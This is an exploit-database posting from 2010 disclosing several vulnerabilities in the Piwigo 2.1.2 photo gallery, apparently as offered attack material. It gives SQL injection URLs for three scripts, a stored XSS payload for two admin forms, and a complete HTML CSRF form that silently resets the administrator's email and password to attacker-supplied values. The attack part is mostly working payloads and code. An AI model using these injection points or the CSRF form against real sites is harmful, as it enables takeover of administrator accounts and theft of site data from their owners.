[webapps / 0day] - piwigo 2.1.2 Multiple vulnerabilities
Posted on 10 September 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>piwigo 2.1.2 Multiple vulnerabilities | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Exploit category: webapps / 0day | Exploit author: Sweet' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>===================================== piwigo 2.1.2 Multiple vulnerabilities ===================================== --=Sql injection=-- http://www.target.com/path/comments.php?keyword=charif38@hotmail.fr&author=sweet&cat=1[SQLi]&since=1&sort_by=date&sort_order=DESC&items_number=5 http://www.target.com/path/picture.php?1sweet[SQLi]&action=rate=0 http://www.target.com/path/index.php?/search/10[SQli] --=Stored Xss=-- Admin login required Attack pattern : >'<script>alert("Sweet")</script> http://www.target.com/path/admin.php?page=tags The POST variable "Nouveau tag" is vulnerable to a stored xss attack http://www.target.com/path/admin.php?page=cat_list The POST variable "Ajouter une catégorie virtuelle" is vulnerable to a stored xss attack --=CSRF=-- Change admin password exploit <html> <body> <h1>Piwigo-2.1.2 Change admin password CSRF </h1> <form method="POST" name="form0" action="http://www.target.com/path/admin.php?page=profile&user_id=1"> <input type="hidden" name="redirect" value="admin.php?page"/> <input type="hidden" name="mail_address" value="charif38@hotmail.fr"/> <!-- Your email here --> <input type="hidden" name="use_new_pwd" value="sweet"/> <!-- Your password here --> <input type="hidden" name="passwordConf" value="sweet"/> <!-- Your password here --> <input type="hidden" name="nb_image_line" value="5"/> <input type="hidden" name="nb_line_page" value="3"/> <input type="hidden" name="theme" value="Sylvia"/> <input type="hidden" name="language" value="fr_FR"/> <input type="hidden" name="recent_period" value="7"/> <input type="hidden" name="expand" value="false"/> <input type="hidden" name="show_nb_comments" value="false"/> <input type="hidden" name="show_nb_hits" value="false"/> <input type="hidden" name="maxwidth" value=""/> <input type="hidden" name="maxheight" value=""/> <p> Push the Button <input type="submit" name="validate" value="Valider"/> </p> </form> <form method="GET" name="form1" action="http://www.target.com/path/admin.php?page=user_list"> <input type="hidden" name="name" value="value"/> </form> </body> </html> [ thx and RIP to Milw0rm.com , JF - Hamst0r - Keystroke you always be right here 3> ] , inj3ct0r.com , exploit-db.com 1,2,3 VIVA LALGERIE # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-10]</pre></body></html>
